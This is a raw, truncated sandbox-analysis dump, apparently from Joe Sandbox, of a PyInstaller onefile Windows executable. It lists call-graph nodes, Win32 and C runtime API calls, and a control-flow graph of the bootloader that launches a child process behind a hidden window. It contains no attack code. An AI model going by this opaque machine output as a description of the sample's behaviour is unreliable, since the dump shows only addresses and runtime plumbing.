16599->16607 16601 7ff62c0fc550 _log10_special 8 API calls 16600->16601 16603 7ff62c112431 16601->16603 16602->16600 16604 7ff62c1126e7 16602->16604 16603->16557 16603->16563 16605 7ff62c112716 GetCPInfo 16604->16605 16604->16607 16605->16600 16605->16607 16656 7ff62c1120dc 16607->16656 16743 7ff62c1102d8 EnterCriticalSection 16608->16743 16625 7ff62c104f70 16624->16625 16626 7ff62c104f6b 16624->16626 16625->16626 16627 7ff62c10b150 __GetCurrentState 45 API calls 16625->16627 16626->16586 16626->16587 16628 7ff62c104f8b 16627->16628 16632 7ff62c10d984 16628->16632 16633 7ff62c10d999 16632->16633 16634 7ff62c104fae 16632->16634 16633->16634 16640 7ff62c113304 16633->16640 16636 7ff62c10d9f0 16634->16636 16637 7ff62c10da18 16636->16637 16638 7ff62c10da05 16636->16638 16637->16626 16638->16637 16653 7ff62c112650 16638->16653 16641 7ff62c10b150 __GetCurrentState 45 API calls 16640->16641 16642 7ff62c113313 16641->16642 16643 7ff62c11335e 16642->16643 16652 7ff62c1102d8 EnterCriticalSection 16642->16652 16643->16634 16654 7ff62c10b150 __GetCurrentState 45 API calls 16653->16654 16655 7ff62c112659 16654->16655 16657 7ff62c112119 GetCPInfo 16656->16657 16658 7ff62c11220f 16656->16658 16657->16658 16664 7ff62c11212c 16657->16664 16659 7ff62c0fc550 _log10_special 8 API calls 16658->16659 16661 7ff62c1122ae 16659->16661 16661->16600 16667 7ff62c112e40 16664->16667 16668 7ff62c104f4c 45 API calls 16667->16668 16669 7ff62c112e82 16668->16669 16687 7ff62c10f8a0 16669->16687 16688 7ff62c10f8a9 MultiByteToWideChar 16687->16688 16745 7ff62c109349 16744->16745 16746 7ff62c1094ad 16744->16746 16745->16521 16747 7ff62c1094d6 16746->16747 16748 7ff62c10a948 __free_lconv_mon 11 API calls 16746->16748 16749 7ff62c10a948 __free_lconv_mon 11 API calls 16747->16749 16748->16746 16749->16745 16751 7ff62c1162d8 16750->16751 16752 7ff62c1162c1 16750->16752 16751->16752 16755 7ff62c1162e6 16751->16755 16753 7ff62c104f08 _get_daylight 11 API calls 16752->16753 16754 7ff62c1162c6 16753->16754 16756 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16754->16756 16757 7ff62c1162d1 16755->16757 16758 7ff62c104f4c 45 API calls 16755->16758 16756->16757 16757->16248 16758->16757 16760 7ff62c104f4c 45 API calls 16759->16760 16761 7ff62c118f71 16760->16761 16764 7ff62c118bc8 16761->16764 16766 7ff62c118c16 16764->16766 16765 7ff62c0fc550 _log10_special 8 API calls 16767 7ff62c117205 16765->16767 16768 7ff62c118c9d 16766->16768 16770 7ff62c118c88 GetCPInfo 16766->16770 16791 7ff62c118ca1 16766->16791 16767->16248 16767->16252 16769 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16768->16769 16768->16791 16771 7ff62c118d35 16769->16771 16770->16768 16770->16791 16772 7ff62c10d5fc _fread_nolock 12 API calls 16771->16772 16773 7ff62c118d6c 16771->16773 16771->16791 16772->16773 16774 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16773->16774 16773->16791 16775 7ff62c118dda 16774->16775 16776 7ff62c118ebc 16775->16776 16777 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16775->16777 16778 7ff62c10a948 __free_lconv_mon 11 API calls 16776->16778 16776->16791 16779 7ff62c118e00 16777->16779 16778->16791 16779->16776 16780 7ff62c10d5fc _fread_nolock 12 API calls 16779->16780 16781 7ff62c118e2d 16779->16781 16780->16781 16781->16776 16782 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16781->16782 16783 7ff62c118ea4 16782->16783 16784 7ff62c118eaa 16783->16784 16785 7ff62c118ec4 16783->16785 16784->16776 16787 7ff62c10a948 __free_lconv_mon 11 API calls 16784->16787 16793 7ff62c10ef68 16785->16793 16787->16776 16789 7ff62c118f03 16789->16791 16792 7ff62c10a948 __free_lconv_mon 11 API calls 16789->16792 16790 7ff62c10a948 __free_lconv_mon 11 API calls 16790->16789 16791->16765 16792->16791 16794 7ff62c10ed10 __crtLCMapStringW 5 API calls 16793->16794 16795 7ff62c10efa6 16794->16795 16796 7ff62c10efae 16795->16796 16797 7ff62c10f1d0 __crtLCMapStringW 5 API calls 16795->16797 16796->16789 16796->16790 16798 7ff62c10f017 CompareStringW 16797->16798 16798->16796 16800 7ff62c117c5a HeapSize 16799->16800 16801 7ff62c117c41 16799->16801 16802 7ff62c104f08 _get_daylight 11 API calls 16801->16802 16803 7ff62c117c46 16802->16803 16804 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16803->16804 16805 7ff62c117c51 16804->16805 16805->16257 16807 7ff62c117c89 16806->16807 16808 7ff62c117c93 16806->16808 16809 7ff62c10d5fc _fread_nolock 12 API calls 16807->16809 16810 7ff62c117c98 16808->16810 16816 7ff62c117c9f _get_daylight 16808->16816 16815 7ff62c117c91 16809->16815 16813 7ff62c10a948 __free_lconv_mon 11 API calls 16810->16813 16811 7ff62c117cd2 HeapReAlloc 16811->16815 16811->16816 16812 7ff62c117ca5 16814 7ff62c104f08 _get_daylight 11 API calls 16812->16814 16813->16815 16814->16815 16815->16260 16816->16811 16816->16812 16817 7ff62c113590 _get_daylight 2 API calls 16816->16817 16817->16816 16819 7ff62c10ed10 __crtLCMapStringW 5 API calls 16818->16819 16820 7ff62c10ef44 16819->16820 16820->16266 16822 7ff62c1054fa 16821->16822 16823 7ff62c1054d6 16821->16823 16824 7ff62c105554 16822->16824 16825 7ff62c1054ff 16822->16825 16827 7ff62c10a948 __free_lconv_mon 11 API calls 16823->16827 16832 7ff62c1054e5 16823->16832 16826 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16824->16826 16828 7ff62c105514 16825->16828 16829 7ff62c10a948 __free_lconv_mon 11 API calls 16825->16829 16825->16832 16835 7ff62c105570 16826->16835 16827->16832 16830 7ff62c10d5fc _fread_nolock 12 API calls 16828->16830 16829->16828 16830->16832 16831 7ff62c105577 GetLastError 16843 7ff62c104e7c 16831->16843 16832->16269 16832->16271 16833 7ff62c1055b2 16833->16832 16837 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 16833->16837 16835->16831 16835->16833 16836 7ff62c1055a5 16835->16836 16839 7ff62c10a948 __free_lconv_mon 11 API calls 16835->16839 16840 7ff62c10d5fc _fread_nolock 12 API calls 16836->16840 16841 7ff62c1055f6 16837->16841 16839->16836 16840->16833 16841->16831 16841->16832 16842 7ff62c104f08 _get_daylight 11 API calls 16842->16832 16844 7ff62c10b2c8 _get_daylight 11 API calls 16843->16844 16845 7ff62c104e89 __free_lconv_mon 16844->16845 16846 7ff62c10b2c8 _get_daylight 11 API calls 16845->16846 16847 7ff62c104eab 16846->16847 16847->16842 16848 7ff62c0fbae0 16849 7ff62c0fbb0e 16848->16849 16850 7ff62c0fbaf5 16848->16850 16850->16849 16852 7ff62c10d5fc 12 API calls 16850->16852 16851 7ff62c0fbb6e 16852->16851 19773 7ff62c109d50 19776 7ff62c109ccc 19773->19776 19783 7ff62c1102d8 EnterCriticalSection 19776->19783 19922 7ff62c10afd0 19923 7ff62c10afea 19922->19923 19924 7ff62c10afd5 19922->19924 19928 7ff62c10aff0 19924->19928 19929 7ff62c10b03a 19928->19929 19930 7ff62c10b032 19928->19930 19932 7ff62c10a948 __free_lconv_mon 11 API calls 19929->19932 19931 7ff62c10a948 __free_lconv_mon 11 API calls 19930->19931 19931->19929 19933 7ff62c10b047 19932->19933 19934 7ff62c10a948 __free_lconv_mon 11 API calls 19933->19934 19935 7ff62c10b054 19934->19935 19936 7ff62c10a948 __free_lconv_mon 11 API calls 19935->19936 19937 7ff62c10b061 19936->19937 19938 7ff62c10a948 __free_lconv_mon 11 API calls 19937->19938 19939 7ff62c10b06e 19938->19939 19940 7ff62c10a948 __free_lconv_mon 11 API calls 19939->19940 19941 7ff62c10b07b 19940->19941 19942 7ff62c10a948 __free_lconv_mon 11 API calls 19941->19942 19943 7ff62c10b088 19942->19943 19944 7ff62c10a948 __free_lconv_mon 11 API calls 19943->19944 19945 7ff62c10b095 19944->19945 19946 7ff62c10a948 __free_lconv_mon 11 API calls 19945->19946 19947 7ff62c10b0a5 19946->19947 19948 7ff62c10a948 __free_lconv_mon 11 API calls 19947->19948 19949 7ff62c10b0b5 19948->19949 19954 7ff62c10ae94 19949->19954 19968 7ff62c1102d8 EnterCriticalSection 19954->19968 19970 7ff62c105410 19971 7ff62c10541b 19970->19971 19979 7ff62c10f2a4 19971->19979 19992 7ff62c1102d8 EnterCriticalSection 19979->19992 20643 7ff62c10c520 20654 7ff62c1102d8 EnterCriticalSection 20643->20654 20390 7ff62c1116b0 20401 7ff62c1173e4 20390->20401 20402 7ff62c1173f1 20401->20402 20403 7ff62c10a948 __free_lconv_mon 11 API calls 20402->20403 20405 7ff62c11740d 20402->20405 20403->20402 20404 7ff62c10a948 __free_lconv_mon 11 API calls 20404->20405 20405->20404 20406 7ff62c1116b9 20405->20406 20407 7ff62c1102d8 EnterCriticalSection 20406->20407 20007 7ff62c11adfe 20008 7ff62c11ae17 20007->20008 20009 7ff62c11ae0d 20007->20009 20011 7ff62c110338 LeaveCriticalSection 20009->20011 19487 7ff62c105628 19488 7ff62c105642 19487->19488 19489 7ff62c10565f 19487->19489 19491 7ff62c104ee8 _fread_nolock 11 API calls 19488->19491 19489->19488 19490 7ff62c105672 CreateFileW 19489->19490 19492 7ff62c1056dc 19490->19492 19493 7ff62c1056a6 19490->19493 19494 7ff62c105647 19491->19494 19538 7ff62c105c04 19492->19538 19512 7ff62c10577c GetFileType 19493->19512 19497 7ff62c104f08 _get_daylight 11 API calls 19494->19497 19498 7ff62c10564f 19497->19498 19501 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19498->19501 19507 7ff62c10565a 19501->19507 19502 7ff62c1056d1 CloseHandle 19502->19507 19503 7ff62c1056bb CloseHandle 19503->19507 19504 7ff62c1056e5 19508 7ff62c104e7c _fread_nolock 11 API calls 19504->19508 19505 7ff62c105710 19559 7ff62c1059c4 19505->19559 19510 7ff62c1056ef 19508->19510 19510->19507 19513 7ff62c1057ca 19512->19513 19514 7ff62c105887 19512->19514 19517 7ff62c1057f6 GetFileInformationByHandle 19513->19517 19522 7ff62c105b00 21 API calls 19513->19522 19515 7ff62c1058b1 19514->19515 19516 7ff62c10588f 19514->19516 19521 7ff62c1058d4 PeekNamedPipe 19515->19521 19526 7ff62c105872 19515->19526 19518 7ff62c105893 19516->19518 19519 7ff62c1058a2 GetLastError 19516->19519 19517->19519 19520 7ff62c10581f 19517->19520 19523 7ff62c104f08 _get_daylight 11 API calls 19518->19523 19525 7ff62c104e7c _fread_nolock 11 API calls 19519->19525 19524 7ff62c1059c4 51 API calls 19520->19524 19521->19526 19527 7ff62c1057e4 19522->19527 19523->19526 19528 7ff62c10582a 19524->19528 19525->19526 19529 7ff62c0fc550 _log10_special 8 API calls 19526->19529 19527->19517 19527->19526 19576 7ff62c105924 19528->19576 19530 7ff62c1056b4 19529->19530 19530->19502 19530->19503 19533 7ff62c105924 10 API calls 19534 7ff62c105849 19533->19534 19535 7ff62c105924 10 API calls 19534->19535 19536 7ff62c10585a 19535->19536 19536->19526 19537 7ff62c104f08 _get_daylight 11 API calls 19536->19537 19537->19526 19539 7ff62c105c3a 19538->19539 19540 7ff62c104f08 _get_daylight 11 API calls 19539->19540 19541 7ff62c105cd2 __std_exception_destroy 19539->19541 19543 7ff62c105c4c 19540->19543 19542 7ff62c0fc550 _log10_special 8 API calls 19541->19542 19544 7ff62c1056e1 19542->19544 19545 7ff62c104f08 _get_daylight 11 API calls 19543->19545 19544->19504 19544->19505 19546 7ff62c105c54 19545->19546 19547 7ff62c107e08 45 API calls 19546->19547 19548 7ff62c105c69 19547->19548 19549 7ff62c105c71 19548->19549 19550 7ff62c105c7b 19548->19550 19551 7ff62c104f08 _get_daylight 11 API calls 19549->19551 19552 7ff62c104f08 _get_daylight 11 API calls 19550->19552 19555 7ff62c105c76 19551->19555 19553 7ff62c105c80 19552->19553 19553->19541 19554 7ff62c104f08 _get_daylight 11 API calls 19553->19554 19556 7ff62c105c8a 19554->19556 19555->19541 19557 7ff62c105cc4 GetDriveTypeW 19555->19557 19558 7ff62c107e08 45 API calls 19556->19558 19557->19541 19558->19555 19560 7ff62c1059ec 19559->19560 19568 7ff62c10571d 19560->19568 19583 7ff62c10f724 19560->19583 19562 7ff62c105a80 19563 7ff62c10f724 51 API calls 19562->19563 19562->19568 19564 7ff62c105a93 19563->19564 19565 7ff62c10f724 51 API calls 19564->19565 19564->19568 19566 7ff62c105aa6 19565->19566 19567 7ff62c10f724 51 API calls 19566->19567 19566->19568 19567->19568 19569 7ff62c105b00 19568->19569 19570 7ff62c105b1a 19569->19570 19571 7ff62c105b51 19570->19571 19572 7ff62c105b2a 19570->19572 19573 7ff62c10f5b8 21 API calls 19571->19573 19574 7ff62c104e7c _fread_nolock 11 API calls 19572->19574 19575 7ff62c105b3a 19572->19575 19573->19575 19574->19575 19575->19510 19577 7ff62c105940 19576->19577 19578 7ff62c10594d FileTimeToSystemTime 19576->19578 19577->19578 19580 7ff62c105948 19577->19580 19579 7ff62c105961 SystemTimeToTzSpecificLocalTime 19578->19579 19578->19580 19579->19580 19581 7ff62c0fc550 _log10_special 8 API calls 19580->19581 19582 7ff62c105839 19581->19582 19582->19533 19584 7ff62c10f755 19583->19584 19585 7ff62c10f731 19583->19585 19587 7ff62c10f78f 19584->19587 19590 7ff62c10f7ae 19584->19590 19585->19584 19586 7ff62c10f736 19585->19586 19588 7ff62c104f08 _get_daylight 11 API calls 19586->19588 19589 7ff62c104f08 _get_daylight 11 API calls 19587->19589 19591 7ff62c10f73b 19588->19591 19592 7ff62c10f794 19589->19592 19593 7ff62c104f4c 45 API calls 19590->19593 19594 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19591->19594 19595 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19592->19595 19598 7ff62c10f7bb 19593->19598 19596 7ff62c10f746 19594->19596 19597 7ff62c10f79f 19595->19597 19596->19562 19597->19562 19598->19597 19599 7ff62c1104dc 51 API calls 19598->19599 19599->19598 16853 7ff62c10f98c 16854 7ff62c10fb7e 16853->16854 16858 7ff62c10f9ce _isindst 16853->16858 16855 7ff62c104f08 _get_daylight 11 API calls 16854->16855 16856 7ff62c10fb6e 16855->16856 16857 7ff62c0fc550 _log10_special 8 API calls 16856->16857 16859 7ff62c10fb99 16857->16859 16858->16854 16860 7ff62c10fa4e _isindst 16858->16860 16874 7ff62c116194 16860->16874 16865 7ff62c10fbaa 16867 7ff62c10a900 _isindst 17 API calls 16865->16867 16869 7ff62c10fbbe 16867->16869 16872 7ff62c10faab 16872->16856 16899 7ff62c1161d8 16872->16899 16875 7ff62c10fa6c 16874->16875 16876 7ff62c1161a3 16874->16876 16881 7ff62c115598 16875->16881 16906 7ff62c1102d8 EnterCriticalSection 16876->16906 16882 7ff62c1155a1 16881->16882 16883 7ff62c10fa81 16881->16883 16884 7ff62c104f08 _get_daylight 11 API calls 16882->16884 16883->16865 16887 7ff62c1155c8 16883->16887 16885 7ff62c1155a6 16884->16885 16886 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16885->16886 16886->16883 16888 7ff62c10fa92 16887->16888 16889 7ff62c1155d1 16887->16889 16888->16865 16893 7ff62c1155f8 16888->16893 16890 7ff62c104f08 _get_daylight 11 API calls 16889->16890 16891 7ff62c1155d6 16890->16891 16892 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16891->16892 16892->16888 16894 7ff62c115601 16893->16894 16896 7ff62c10faa3 16893->16896 16895 7ff62c104f08 _get_daylight 11 API calls 16894->16895 16897 7ff62c115606 16895->16897 16896->16865 16896->16872 16898 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16897->16898 16898->16896 16907 7ff62c1102d8 EnterCriticalSection 16899->16907

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 7ff62c0f89e0-7ff62c0f8b26 call 7ff62c0fc850 call 7ff62c0f9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff62c1053f0 call 7ff62c10a47c call 7ff62c10871c call 7ff62c1053f0 call 7ff62c10a47c call 7ff62c10871c call 7ff62c1053f0 call 7ff62c10a47c call 7ff62c10871c GetCommandLineW CreateProcessW 23 7ff62c0f8b4d-7ff62c0f8b89 RegisterClassW 0->23 24 7ff62c0f8b28-7ff62c0f8b48 GetLastError call 7ff62c0f2c50 0->24 26 7ff62c0f8b91-7ff62c0f8be5 CreateWindowExW 23->26 27 7ff62c0f8b8b GetLastError 23->27 31 7ff62c0f8e39-7ff62c0f8e5f call 7ff62c0fc550 24->31 29 7ff62c0f8bef-7ff62c0f8bf4 ShowWindow 26->29 30 7ff62c0f8be7-7ff62c0f8bed GetLastError 26->30 27->26 32 7ff62c0f8bfa-7ff62c0f8c0a WaitForSingleObject 29->32 30->32 34 7ff62c0f8c0c 32->34 35 7ff62c0f8c88-7ff62c0f8c8f 32->35 39 7ff62c0f8c10-7ff62c0f8c13 34->39 36 7ff62c0f8cd2-7ff62c0f8cd9 35->36 37 7ff62c0f8c91-7ff62c0f8ca1 WaitForSingleObject 35->37 42 7ff62c0f8dc0-7ff62c0f8dd9 GetMessageW 36->42 43 7ff62c0f8cdf-7ff62c0f8cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff62c0f8df8-7ff62c0f8e02 37->40 41 7ff62c0f8ca7-7ff62c0f8cb7 TerminateProcess 37->41 44 7ff62c0f8c15 GetLastError 39->44 45 7ff62c0f8c1b-7ff62c0f8c22 39->45 46 7ff62c0f8e04-7ff62c0f8e0a DestroyWindow 40->46 47 7ff62c0f8e11-7ff62c0f8e35 GetExitCodeProcess CloseHandle * 2 40->47 48 7ff62c0f8cbf-7ff62c0f8ccd WaitForSingleObject 41->48 49 7ff62c0f8cb9 GetLastError 41->49 52 7ff62c0f8def-7ff62c0f8df6 42->52 53 7ff62c0f8ddb-7ff62c0f8de9 TranslateMessage DispatchMessageW 42->53 50 7ff62c0f8d00-7ff62c0f8d38 MsgWaitForMultipleObjects PeekMessageW 43->50 44->45 45->37 51 7ff62c0f8c24-7ff62c0f8c41 PeekMessageW 45->51 46->47 47->31 48->40 49->48 54 7ff62c0f8d73-7ff62c0f8d7a 50->54 55 7ff62c0f8d3a 50->55 56 7ff62c0f8c43-7ff62c0f8c74 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff62c0f8c76-7ff62c0f8c86 WaitForSingleObject 51->57 52->40 52->42 53->52 54->42 59 7ff62c0f8d7c-7ff62c0f8da5 QueryPerformanceCounter 54->59 58 7ff62c0f8d40-7ff62c0f8d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->35 57->39 58->54 58->58 59->50 60 7ff62c0f8dab-7ff62c0f8db2 59->60 60->40 61 7ff62c0f8db4-7ff62c0f8db8 60->61 61->42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction ID: d7252acce92481b4eccf3537b187236782f2d67d36c8bbdcf4d5647aad6e1b89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D18172A08A8286EF108F38EC592AD3760FF95B68F504235DE5E83AA4DF7CD154C746

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 62 7ff62c0f1000-7ff62c0f3806 call 7ff62c0ffe18 call 7ff62c0ffe20 call 7ff62c0fc850 call 7ff62c1053f0 call 7ff62c105484 call 7ff62c0f36b0 76 7ff62c0f3814-7ff62c0f3836 call 7ff62c0f1950 62->76 77 7ff62c0f3808-7ff62c0f380f 62->77 82 7ff62c0f383c-7ff62c0f3856 call 7ff62c0f1c80 76->82 83 7ff62c0f391b-7ff62c0f3931 call 7ff62c0f45c0 76->83 78 7ff62c0f3c97-7ff62c0f3cb2 call 7ff62c0fc550 77->78 87 7ff62c0f385b-7ff62c0f389b call 7ff62c0f8830 82->87 90 7ff62c0f3933-7ff62c0f3960 call 7ff62c0f7f90 83->90 91 7ff62c0f396a-7ff62c0f397f call 7ff62c0f2710 83->91 96 7ff62c0f38c1-7ff62c0f38cc call 7ff62c104f30 87->96 97 7ff62c0f389d-7ff62c0f38a3 87->97 103 7ff62c0f3984-7ff62c0f39a6 call 7ff62c0f1c80 90->103 104 7ff62c0f3962-7ff62c0f3965 call 7ff62c10004c 90->104 99 7ff62c0f3c8f 91->99 111 7ff62c0f38d2-7ff62c0f38e1 call 7ff62c0f8830 96->111 112 7ff62c0f39fc-7ff62c0f3a2a call 7ff62c0f8940 call 7ff62c0f89a0 * 3 96->112 100 7ff62c0f38a5-7ff62c0f38ad 97->100 101 7ff62c0f38af-7ff62c0f38bd call 7ff62c0f89a0 97->101 99->78 100->101 101->96 114 7ff62c0f39b0-7ff62c0f39b9 103->114 104->91 119 7ff62c0f39f4-7ff62c0f39f7 call 7ff62c104f30 111->119 120 7ff62c0f38e7-7ff62c0f38ed 111->120 138 7ff62c0f3a2f-7ff62c0f3a3e call 7ff62c0f8830 112->138 114->114 118 7ff62c0f39bb-7ff62c0f39d8 call 7ff62c0f1950 114->118 118->87 130 7ff62c0f39de-7ff62c0f39ef call 7ff62c0f2710 118->130 119->112 123 7ff62c0f38f0-7ff62c0f38fc 120->123 127 7ff62c0f3905-7ff62c0f3908 123->127 128 7ff62c0f38fe-7ff62c0f3903 123->128 127->119 131 7ff62c0f390e-7ff62c0f3916 call 7ff62c104f30 127->131 128->123 128->127 130->99 131->138 141 7ff62c0f3a44-7ff62c0f3a47 138->141 142 7ff62c0f3b45-7ff62c0f3b53 138->142 141->142 145 7ff62c0f3a4d-7ff62c0f3a50 141->145 143 7ff62c0f3b59-7ff62c0f3b5d 142->143 144 7ff62c0f3a67 142->144 146 7ff62c0f3a6b-7ff62c0f3a90 call 7ff62c104f30 143->146 144->146 147 7ff62c0f3b14-7ff62c0f3b17 145->147 148 7ff62c0f3a56-7ff62c0f3a5a 145->148 156 7ff62c0f3a92-7ff62c0f3aa6 call 7ff62c0f8940 146->156 157 7ff62c0f3aab-7ff62c0f3ac0 146->157 151 7ff62c0f3b2f-7ff62c0f3b40 call 7ff62c0f2710 147->151 152 7ff62c0f3b19-7ff62c0f3b1d 147->152 148->147 150 7ff62c0f3a60 148->150 150->144 160 7ff62c0f3c7f-7ff62c0f3c87 151->160 152->151 155 7ff62c0f3b1f-7ff62c0f3b2a 152->155 155->146 156->157 161 7ff62c0f3be8-7ff62c0f3bfa call 7ff62c0f8830 157->161 162 7ff62c0f3ac6-7ff62c0f3aca 157->162 160->99 170 7ff62c0f3c2e 161->170 171 7ff62c0f3bfc-7ff62c0f3c02 161->171 164 7ff62c0f3ad0-7ff62c0f3ae8 call 7ff62c105250 162->164 165 7ff62c0f3bcd-7ff62c0f3be2 call 7ff62c0f1940 162->165 175 7ff62c0f3b62-7ff62c0f3b7a call 7ff62c105250 164->175 176 7ff62c0f3aea-7ff62c0f3b02 call 7ff62c105250 164->176 165->161 165->162 177 7ff62c0f3c31-7ff62c0f3c40 call 7ff62c104f30 170->177 173 7ff62c0f3c04-7ff62c0f3c1c 171->173 174 7ff62c0f3c1e-7ff62c0f3c2c 171->174 173->177 174->177 184 7ff62c0f3b7c-7ff62c0f3b80 175->184 185 7ff62c0f3b87-7ff62c0f3b9f call 7ff62c105250 175->185 176->165 186 7ff62c0f3b08-7ff62c0f3b0f 176->186 187 7ff62c0f3d41-7ff62c0f3d63 call 7ff62c0f44e0 177->187 188 7ff62c0f3c46-7ff62c0f3c4a 177->188 184->185 201 7ff62c0f3ba1-7ff62c0f3ba5 185->201 202 7ff62c0f3bac-7ff62c0f3bc4 call 7ff62c105250 185->202 186->165 199 7ff62c0f3d65-7ff62c0f3d6f call 7ff62c0f4630 187->199 200 7ff62c0f3d71-7ff62c0f3d82 call 7ff62c0f1c80 187->200 191 7ff62c0f3cd4-7ff62c0f3ce6 call 7ff62c0f8830 188->191 192 7ff62c0f3c50-7ff62c0f3c5f call 7ff62c0f90e0 188->192 205 7ff62c0f3d35-7ff62c0f3d3c 191->205 206 7ff62c0f3ce8-7ff62c0f3ceb 191->206 203 7ff62c0f3cb3-7ff62c0f3cb6 call 7ff62c0f8660 192->203 204 7ff62c0f3c61 192->204 213 7ff62c0f3d87-7ff62c0f3d96 199->213 200->213 201->202 202->165 216 7ff62c0f3bc6 202->216 221 7ff62c0f3cbb-7ff62c0f3cbd 203->221 210 7ff62c0f3c68 call 7ff62c0f2710 204->210 205->210 206->205 211 7ff62c0f3ced-7ff62c0f3d10 call 7ff62c0f1c80 206->211 222 7ff62c0f3c6d-7ff62c0f3c77 210->222 228 7ff62c0f3d12-7ff62c0f3d26 call 7ff62c0f2710 call 7ff62c104f30 211->228 229 7ff62c0f3d2b-7ff62c0f3d33 call 7ff62c104f30 211->229 219 7ff62c0f3dbc-7ff62c0f3dd2 call 7ff62c0f9390 213->219 220 7ff62c0f3d98-7ff62c0f3d9f 213->220 216->165 234 7ff62c0f3dd4 219->234 235 7ff62c0f3de0-7ff62c0f3dfc SetDllDirectoryW 219->235 220->219 224 7ff62c0f3da1-7ff62c0f3da5 220->224 226 7ff62c0f3cbf-7ff62c0f3cc6 221->226 227 7ff62c0f3cc8-7ff62c0f3ccf 221->227 222->160 224->219 230 7ff62c0f3da7-7ff62c0f3db6 LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->219 234->235 236 7ff62c0f3e02-7ff62c0f3e11 call 7ff62c0f8830 235->236 237 7ff62c0f3ef9-7ff62c0f3f00 235->237 250 7ff62c0f3e13-7ff62c0f3e19 236->250 251 7ff62c0f3e2a-7ff62c0f3e34 call 7ff62c104f30 236->251 242 7ff62c0f4000-7ff62c0f4008 237->242 243 7ff62c0f3f06-7ff62c0f3f0d 237->243 244 7ff62c0f402d-7ff62c0f405f call 7ff62c0f36a0 call 7ff62c0f3360 call 7ff62c0f3670 call 7ff62c0f6fc0 call 7ff62c0f6d70 242->244 245 7ff62c0f400a-7ff62c0f4027 PostMessageW GetMessageW 242->245 243->242 248 7ff62c0f3f13-7ff62c0f3f1d call 7ff62c0f33c0 243->248 245->244 248->222 258 7ff62c0f3f23-7ff62c0f3f37 call 7ff62c0f90c0 248->258 255 7ff62c0f3e25-7ff62c0f3e27 250->255 256 7ff62c0f3e1b-7ff62c0f3e23 250->256 263 7ff62c0f3eea-7ff62c0f3ef4 call 7ff62c0f8940 251->263 264 7ff62c0f3e3a-7ff62c0f3e40 251->264 255->251 256->255 269 7ff62c0f3f5c-7ff62c0f3f9f call 7ff62c0f8940 call 7ff62c0f89e0 call 7ff62c0f6fc0 call 7ff62c0f6d70 call 7ff62c0f88e0 258->269 270 7ff62c0f3f39-7ff62c0f3f56 PostMessageW GetMessageW 258->270 263->237 264->263 268 7ff62c0f3e46-7ff62c0f3e4c 264->268 272 7ff62c0f3e4e-7ff62c0f3e50 268->272 273 7ff62c0f3e57-7ff62c0f3e59 268->273 310 7ff62c0f3fa1-7ff62c0f3fb7 call 7ff62c0f8ed0 call 7ff62c0f88e0 269->310 311 7ff62c0f3fed-7ff62c0f3ff4 call 7ff62c0f1900 269->311 270->269 274 7ff62c0f3e5f-7ff62c0f3e7b call 7ff62c0f6dc0 call 7ff62c0f7340 272->274 277 7ff62c0f3e52 272->277 273->237 273->274 289 7ff62c0f3e7d-7ff62c0f3e84 274->289 290 7ff62c0f3e86-7ff62c0f3e8d 274->290 277->237 292 7ff62c0f3ed3-7ff62c0f3ee8 call 7ff62c0f2a50 call 7ff62c0f6fc0 call 7ff62c0f6d70 289->292 293 